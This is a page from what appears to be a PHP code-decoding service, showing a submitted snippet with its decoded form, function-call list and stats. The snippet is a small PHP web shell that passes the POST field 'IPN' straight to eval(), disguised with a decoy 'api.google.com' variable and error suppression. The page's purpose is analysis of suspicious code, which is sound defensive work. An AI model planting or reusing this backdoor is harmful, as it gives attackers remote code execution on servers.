Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $a ="api.google.com"; function yuag($a){ eval($a); } @ yuag($_POST['IPN']);?>..

Decoded Output download

<?php 
$a ="api.google.com"; 
function yuag($a){ 
eval($a); 
} 
@ 
yuag($_POST['IPN']);?>

Did this file decode correctly?

Original Code

<?php
$a ="api.google.com";
function yuag($a){
eval($a);
}
@
yuag($_POST['IPN']);?>

Function Calls

yuag 1

Variables

$a None

Stats

MD5 8c14ee216c5584b15d1e1fe273e42534
Eval Count 0
Decode Time 88 ms